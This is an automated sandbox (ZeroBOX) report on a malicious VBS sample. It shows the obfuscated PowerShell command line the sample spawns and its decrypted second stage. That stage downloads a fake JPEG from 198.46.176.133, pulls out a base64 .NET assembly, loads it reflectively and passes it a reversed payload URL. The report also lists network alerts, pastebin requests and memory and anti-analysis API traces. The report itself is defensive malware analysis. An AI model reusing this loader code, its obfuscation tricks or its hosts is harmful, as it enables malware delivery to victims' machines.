Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 24, 2024, 9:11 a.m.	July 24, 2024, 9:13 a.m.

Size	54.6KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`bc2278089ce81da106bd59335fa9e998`
SHA256	`a8b63d5d21be9c260d6b624f44b14caa228738d110eeac57f0cf7725a622c035`
CRC32	`04F5372E`
ssdeep	`1536:QdU+NdJIdJ4ZxedJasiNJjJl3ndZqbd6M0C+6kZp03mt2:CZx/vHZqpX+7U3S2`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\simpleweightcreatednicething.gIF.vbs
3024
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31288118537265901671092296545801CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI9qzw9rWNQXNXTkOMi91Vo37XNXwKsDkID6RFqNMIb+XDhn4Y5AbEg30f25b/EyGdGGjWsHDIIox1WuVuUdOUadjhme+5zvVV44oiyworfCO2lfsB1IQVwYt2W3SwF0Ux7M7imAEKs79W60z/0ynAsj8hj2vt/lnFQIiUMLXwxtg0ygxaA1q2xZSJwwSMDWyzIontKVe2xHt1HI77rYSt/VnOayqQ2yg7Mp48pY+uj2EZP74FtBnkcE9p92gZJxz+peJ+AKTzl7JeqJQuodXWFmK9sgGK4n13RybKFC+dVb8O8Krc/u05EdmP8zqWyMN4CIIIo6bc+uy3dadl98BZbD0z03uf3Oz6xO+gLfn9tOR1YKsukLXT2OScPDC2jP9f9Yqq+KSXQNHugPnILvW7k+DBL1ZjUxKLNlvCe0NOpwgh8+75a/DTYGBpNBdkSv6BeMFiZTOcAGGEAB5TlZIOZzRTBw8GIX57ryKhBD+OOgtPd2gLFQriTRl2LIoUqCZ1NdzqGQpGwwf4BXbnED2n7yIY2OKKYAovsduKNeTRlypT3jEkMxq1Z51SmOLPNtSqgYjTlhY1Pf+4wEgtf5RvJnRdkbil32H7SckZeqIf4a57uzHIqbcG+bjJT0/Q8jk0lXBCRIMGQd1Frr3sKLigZVlZV51M8hR24sv8ALa2EgO+gSMuthSXw3J2JazJgRKFhsjaMNJMFeeAuPC9u3bhyNRUUxtNbaEkf5p/2U/Td9f3luetP2LV6G1qctY5iGj1puWd+7Oa1A9Jx8sKWBfK7ssUEzfA5tRfwJs+Yig4neb6zjDL+RrpEHNFlkE8+TDOUhcNUOaaxmdagb669MaY6AUHuBGbW4T3clqQY3KqMWiWxvWFBjhAXh4oSmZFSY/+TaEY+Bjm7AbSBTspTWmyfY2HbT2L5cOwDGAAmIx3UR2NUByK70uEAvM2Yz5ioHv8hB18Qc2MMkbxqSrhFr41oRCPhdCx89cUfnKhXUDDd2TkPICClvjRXaMqZ9/NY0GbTYZhUyGeiljzB9o333Pd4tXJeCeAXf7pdSIB5lulheY+jHzCGimEp3VVl2AkjOwPbeoJhwjAUV22t+K1mLSHCLkb+kxdZ8PTVzqfErU5M/wAcukzKiEIWL67nmNrbrCQr0n4yiBww55JzH6QlqH4bo8R3wkrh+6GeX2DuozRIcrO+EJkFIyPGqzNOLbPmOMp2ywAQFZmKLtSNxMb1p4gtH1hzuGDw855hxFyyAs5y4m0NtXFrTGbDRUXgJ0rYRgPSAr/DFlNfYC4xRFI4A4HllUDOPIr2vsL8x87drooa8oqLFJuRFU8yqTyYdo3WNhu0QjHhbWlwKo+VZRctR1fsH+/yM/e99xk2kRcHOemzLzjSfiD4PKV4nvV6jwTReR+4NtyQtYW+KGUdbNqX7Wd4A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
  1188

Name	Response	Post-Analysis Lookup
pastecode.dev	A 172.66.40.229 A 172.66.43.27	172.66.40.229

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.66.40.229	Active	Moloch
198.46.176.133	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:63709 -> 164.124.101.2:53	2053944	ET INFO Pastebin-like Service Domain in DNS Lookup (pastecode .dev)	Misc activity
TCP 198.46.176.133:80 -> 192.168.56.102:49164	2047750	ET MALWARE Base64 Encoded MZ In Image	A Network Trojan was detected
TCP 192.168.56.102:49161 -> 172.66.40.229:443	2053997	ET INFO Observed Pastebin-like Service Domain (pastecode .dev) in TLS SNI	Misc activity
TCP 192.168.56.102:49161 -> 172.66.40.229:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 198.46.176.133:80 -> 192.168.56.102:49164	2049038	ET MALWARE Malicious Base64 Encoded Payload In Image	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49161 172.66.40.229:443	C=US, O=Google Trust Services, CN=WE1	CN=pastecode.dev	d9:2a:74:a8:39:b7:f5:58:35:8b:6b:79:ec:51:d6:73:e6:0f:03:b8

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 24, 2024, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 24, 2024, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:11 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 24, 2024, 9:11 a.m.			0	0

Command line console output was observed (50 out of 58 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Method invocation failed because [System.Security.Cryptography.AesManaged] does console_handle: 0x00000023	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: n't contain a method named 'Dispose'. console_handle: 0x0000002f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: At line:1 char:715 console_handle: 0x0000003b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: + function Decrypt-AESEncryption {Param([String]$Base64Text,[String]$Key)$aesMa console_handle: 0x00000047	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: naged = New-Object System.Security.Cryptography.AesManaged;$aesManaged.Mode = [ console_handle: 0x00000053	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: System.Security.Cryptography.CipherMode]::CBC;$aesManaged.Padding = [System.Sec console_handle: 0x0000005f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: urity.Cryptography.PaddingMode]::Zeros;$aesManaged.BlockSize = 128;$aesManaged. console_handle: 0x0000006b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: KeySize = 256;$aesManaged.Key = (New-Object System.Security.Cryptography.SHA256 console_handle: 0x00000077	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key));$cipherBytes console_handle: 0x00000083	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: = [System.Convert]::FromBase64String($Base64Text);$aesManaged.IV = $cipherBytes console_handle: 0x0000008f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: [0..15];$decryptor = $aesManaged.CreateDecryptor();$decryptedBytes = $decryptor console_handle: 0x0000009b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: .TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16);$aesManaged.Di console_handle: 0x000000a7	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: spose <<<< ();return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Tr console_handle: 0x000000b3	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: im([char]0);}$chave = "31288118537265901671092296545801";$textoCriptografadoBas console_handle: 0x000000bf	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: e64 = "9qzw9rWNQXNXTkOMi91Vo37XNXwKsDkID6RFqNMIb+XDhn4Y5AbEg30f25b/EyGdGGjWsHDI console_handle: 0x000000cb	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Iox1WuVuUdOUadjhme+5zvVV44oiyworfCO2lfsB1IQVwYt2W3SwF0Ux7M7imAEKs79W60z/0ynAsj8 console_handle: 0x000000d7	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: hj2vt/lnFQIiUMLXwxtg0ygxaA1q2xZSJwwSMDWyzIontKVe2xHt1HI77rYSt/VnOayqQ2yg7Mp48pY console_handle: 0x000000e3	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: +uj2EZP74FtBnkcE9p92gZJxz+peJ+AKTzl7JeqJQuodXWFmK9sgGK4n13RybKFC+dVb8O8Krc/u05E console_handle: 0x000000ef	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: dmP8zqWyMN4CIIIo6bc+uy3dadl98BZbD0z03uf3Oz6xO+gLfn9tOR1YKsukLXT2OScPDC2jP9f9Yqq console_handle: 0x000000fb	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: +KSXQNHugPnILvW7k+DBL1ZjUxKLNlvCe0NOpwgh8+75a/DTYGBpNBdkSv6BeMFiZTOcAGGEAB5TlZI console_handle: 0x00000107	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: OZzRTBw8GIX57ryKhBD+OOgtPd2gLFQriTRl2LIoUqCZ1NdzqGQpGwwf4BXbnED2n7yIY2OKKYAovsd console_handle: 0x00000113	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: uKNeTRlypT3jEkMxq1Z51SmOLPNtSqgYjTlhY1Pf+4wEgtf5RvJnRdkbil32H7SckZeqIf4a57uzHIq console_handle: 0x0000011f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: bcG+bjJT0/Q8jk0lXBCRIMGQd1Frr3sKLigZVlZV51M8hR24sv8ALa2EgO+gSMuthSXw3J2JazJgRKF console_handle: 0x0000012b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: hsjaMNJMFeeAuPC9u3bhyNRUUxtNbaEkf5p/2U/Td9f3luetP2LV6G1qctY5iGj1puWd+7Oa1A9Jx8s console_handle: 0x00000137	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: KWBfK7ssUEzfA5tRfwJs+Yig4neb6zjDL+RrpEHNFlkE8+TDOUhcNUOaaxmdagb669MaY6AUHuBGbW4 console_handle: 0x00000143	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: T3clqQY3KqMWiWxvWFBjhAXh4oSmZFSY/+TaEY+Bjm7AbSBTspTWmyfY2HbT2L5cOwDGAAmIx3UR2NU console_handle: 0x0000014f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: ByK70uEAvM2Yz5ioHv8hB18Qc2MMkbxqSrhFr41oRCPhdCx89cUfnKhXUDDd2TkPICClvjRXaMqZ9/N console_handle: 0x0000015b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Y0GbTYZhUyGeiljzB9o333Pd4tXJeCeAXf7pdSIB5lulheY+jHzCGimEp3VVl2AkjOwPbeoJhwjAUV2 console_handle: 0x00000167	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: 2t+K1mLSHCLkb+kxdZ8PTVzqfErU5M/wAcukzKiEIWL67nmNrbrCQr0n4yiBww55JzH6QlqH4bo8R3w console_handle: 0x00000173	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: krh+6GeX2DuozRIcrO+EJkFIyPGqzNOLbPmOMp2ywAQFZmKLtSNxMb1p4gtH1hzuGDw855hxFyyAs5y console_handle: 0x0000017f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: 4m0NtXFrTGbDRUXgJ0rYRgPSAr/DFlNfYC4xRFI4A4HllUDOPIr2vsL8x87drooa8oqLFJuRFU8yqTy console_handle: 0x0000018b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Ydo3WNhu0QjHhbWlwKo+VZRctR1fsH+/yM/e99xk2kRcHOemzLzjSfiD4PKV4nvV6jwTReR+4NtyQtY console_handle: 0x00000197	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: W+KGUdbNqX7Wd4A==";$textoDescriptografado = Decrypt-AESEncryption -Base64Text $ console_handle: 0x000001a3	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: textoCriptografadoBase64 -Key $chave;Write-Host "Texto Descriptografado: $texto console_handle: 0x000001af	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Descriptografado";Invoke-Expression $textoDescriptografado; console_handle: 0x000001bb	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: + CategoryInfo : InvalidOperation: (Dispose:String) [], RuntimeEx console_handle: 0x000001c7	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: ception console_handle: 0x000001d3	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x000001df	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Texto Descriptografado: $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.zgruB/839/11.222.381.64//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } } console_handle: 0x000001fb	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc console_handle: 0x00000023	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: ol is not supported." console_handle: 0x0000002f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: At line:1 char:916 console_handle: 0x0000003b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: + $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object Syst console_handle: 0x00000047	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: em.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catc console_handle: 0x00000053	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: h { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit console_handle: 0x0000005f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.G console_handle: 0x0000006b	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: etString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE6 console_handle: 0x00000077	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: 4_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText. console_handle: 0x00000083	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $sta console_handle: 0x0000008f	1	1
WriteConsoleW July 24, 2024, 9:11 a.m.	buffer: rtIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64C console_handle: 0x0000009b	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003158d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003158d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003158d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003154d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003154d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003154d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003154d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003154d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003154d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00314fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00314fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00314fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00315498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 24, 2024, 9:11 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://198.46.176.133/Upload/vbs.jpeg

Performs some HTTP requests (2 events)

request	GET http://198.46.176.133/Upload/vbs.jpeg
request	GET https://pastecode.dev/raw/6l7qjjrz/paste1.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 167 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:11 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02971000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
